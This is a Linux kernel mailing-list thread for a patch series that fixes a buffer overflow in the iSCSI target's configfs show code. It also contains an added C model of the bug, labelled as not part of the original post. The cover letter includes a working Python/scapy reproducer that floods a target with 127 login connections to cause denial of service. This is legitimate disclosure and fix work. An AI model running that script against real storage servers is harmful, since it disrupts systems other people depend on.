[0/2] scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c

Message ID 20230722152657.168859-1-k.shelekhin@yadro.com (mailing list archive)

Message

Konstantin Shelekhin July 22, 2023, 3:26 p.m. UTC
This patch series cleanses iscsi_target_configfs.c of sprintf usage. The
first patch fixes the real problem, the second just makes sure we are on
the safe side from now on.

I've reproduced the issue fixed in the first patch by utilizing this
cool thing:

  https://git.sr.ht/~kshelekhin/scapy-iscsi

Yeah, shameless promoting of my own tools, but I like the simplicity of
scapy and writing tests in C with libiscsi can be a little cumbersome.

Check it out:

  #!/usr/bin/env python3
  # Let's cause some DoS in iSCSI target

  import sys

  from scapy.supersocket import StreamSocket
  from scapy_iscsi.iscsi import *

  cpr = {
      "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
      "TargetName": "iqn.2023-07.com.example:target",
      "HeaderDigest": "None",
      "DataDigest": "None",
  }

  spr = {
      "SessionType": "Normal",
      "ErrorRecoveryLevel": 0,
      "DefaultTime2Retain": 0,
      "DefaultTime2Wait": 2,
      "ImmediateData": "Yes",
      "FirstBurstLength": 65536,
      "MaxBurstLength": 262144,
      "MaxRecvDataSegmentLength": 262144,
      "MaxOutstandingR2T": 1,
  }

  if len(sys.argv) != 3:
      print("usage: dos.py <host> <port>", file=sys.stderr)
      exit(1)

  host = sys.argv[1]
  port = int(sys.argv[2])
  isid = 0xB00B
  tsih = 0
  connections = []

  for i in range(0, 127):
      s = socket.socket()
      s.connect((host, port))
      s = StreamSocket(s, ISCSI)

      ds = cpr if i > 0 else cpr | spr
      lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
      lirs = s.sr1(lirq)
      tsih = lirs.tsih

      connections.append(s)

  input()

Konstantin Shelekhin (2):
  scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show
  scsi: target: iscsi: Stop using sprintf in iscsi_target_configfs.c

 drivers/target/iscsi/iscsi_target_configfs.c | 72 ++++++++++----------
 1 file changed, 36 insertions(+), 36 deletions(-)
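
Added example, not part of the original post or of the kernel patches: a userspace C model of the bug class the series removes, where a show callback appends one record per connection into a fixed page with sprintf. The emit_at() helper is modelled on the kernel's sysfs_emit_at(); the 4 KiB page size, the record format and all names are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define PAGE_SZ 4096 /* assumption: the show buffer is one 4 KiB page */
/* Constructed per-connection record, not the driver's real format. */
#define REC_FMT "CID: %d  Connection State: LOGGED_IN\n" \
                "   Address 192.0.2.10 TCP  StatSN: 0x%08x\n"

static char demo_page[PAGE_SZ];

/* Bounded append modelled on the kernel's sysfs_emit_at(): never writes
 * past the page, returns the bytes actually added (0 once full). */
static int emit_at(char *page, int at, const char *fmt, ...)
{
    va_list ap;
    int room, n;
    if (at < 0 || at >= PAGE_SZ)
        return 0;
    room = PAGE_SZ - at;
    va_start(ap, fmt);
    n = vsnprintf(page + at, (size_t)room, fmt, ap);
    va_end(ap);
    return n < 0 ? 0 : (n >= room ? room - 1 : n); /* count what fit */
}

/* Bytes a "rb += sprintf(page + rb, ...)" loop would write in total. */
static size_t unbounded_need(int nconn)
{
    size_t need = 0;
    for (int cid = 0; cid < nconn; cid++)
        need += (size_t)snprintf(NULL, 0, REC_FMT, cid, 0u);
    return need;
}

/* The same loop with the bounded append; result is always < PAGE_SZ. */
static int show_bounded(char *page, int nconn)
{
    int rb = 0;
    for (int cid = 0; cid < nconn; cid++)
        rb += emit_at(page, rb, REC_FMT, cid, 0u);
    return rb;
}

int main(void)
{
    printf("need %zu, wrote %d\n", unbounded_need(127), show_bounded(demo_page, 127));
    return 0;
}
```

With 127 records the unbounded loop needs well over one page, while the bounded loop stops at PAGE_SZ - 1 bytes and leaves the buffer NUL-terminated.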

Comments

Martin K. Petersen July 31, 2023, 4:13 p.m. UTC | #1
Konstantin,

> This patch series cleanses iscsi_target_configfs.c of sprintf usage.
> The first patch fixes the real problem, the second just makes sure we
> are on the safe side from now on.

Applied to 6.6/scsi-staging, thanks!

Martin K. Petersen Aug. 8, 2023, 2:50 a.m. UTC | #2
On Sat, 22 Jul 2023 18:26:36 +0300, Konstantin Shelekhin wrote:

> This patch series cleanses iscsi_target_configfs.c of sprintf usage. The
> first patch fixes the real problem, the second just makes sure we are on
> the safe side from now on.
> 
> I've reproduced the issue fixed in the first patch by utilizing this
> cool thing:
> 
> [...]

Applied to 6.6/scsi-queue, thanks!

[1/2] scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show
      https://git.kernel.org/mkp/scsi/c/801f287c93ff
[2/2] scsi: target: iscsi: Stop using sprintf in iscsi_target_configfs.c
      https://git.kernel.org/mkp/scsi/c/c0431feb0a75